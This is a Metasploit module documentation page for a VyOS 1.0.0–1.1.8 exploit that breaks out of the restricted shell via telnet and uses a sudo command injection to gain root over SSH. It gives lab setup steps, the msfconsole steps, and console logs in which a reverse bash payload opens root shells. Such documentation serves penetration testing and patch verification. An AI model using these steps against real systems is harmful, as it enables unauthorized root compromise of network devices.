adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
7ddae49fab0e21d26496d1a315b58d9bf36b352e
metasploit-gs/documentation/modules/exploit/linux/ssh/vyos_restricted_shell_privesc.md
T

4.5 KiB
Raw Blame History

Vulnerable Application

This module exploits command injection vulnerabilities and an insecure default sudo configuration on VyOS versions 1.0.0 <= 1.1.8 to execute arbitrary system commands as root.

VyOS features a restricted-shell system shell intended for use by low privilege users with operator privileges. This module exploits a vulnerability in the telnet command to break out of the restricted shell, then uses sudo to exploit a command injection vulnerability in /opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl to execute commands with root privileges.

This module has been tested successfully on VyOS 1.1.8 amd64 and VyOS 1.0.0 i386.

Verification Steps

Download:

Login as vyos / vyos.

Create a new user with operator privileges:

vyos@vyos:~$ configure
[edit]
vyos@vyos# set system login user jsmith full-name "John Smith"
[edit]
vyos@vyos# set system login user jsmith authentication plaintext-password password
[edit]
vyos@vyos# set system login user jsmith level operator
[edit]
vyos@vyos# commit
s[edit]
vyos@vyos# save
Saving configuration to '/config/config.boot'...
Done

Start the OpenSSH service:

vyos@vyos:~$ sudo sh
sh-4.1# service ssh start
  1. Start msfconsole
  2. Do: use exploit/linux/ssh/vyos_restricted_shell_privesc
  3. Do: set RHOSTS [IP]
  4. Do: set USERNAME [username]
  5. Do: set PASSWORD [password]
  6. Do: set payload [payload]
  7. Do: set LHOST [IP]
  8. Do: exploit

Options

USERNAME

SSH username (default: vyos)

PASSWORD

SSH password (default: vyos)

Scenarios

VyOS 1.1.8 (amd64) - operator user

msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith
username => jsmith
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password
password => password
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using restricted-shell. Attempting breakout to system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l

VyOS 1.1.8 (amd64) - admin user

msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos
username => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos
password => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using unrestricted shell. Launching system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
Reference in New Issue View Git Blame Copy Permalink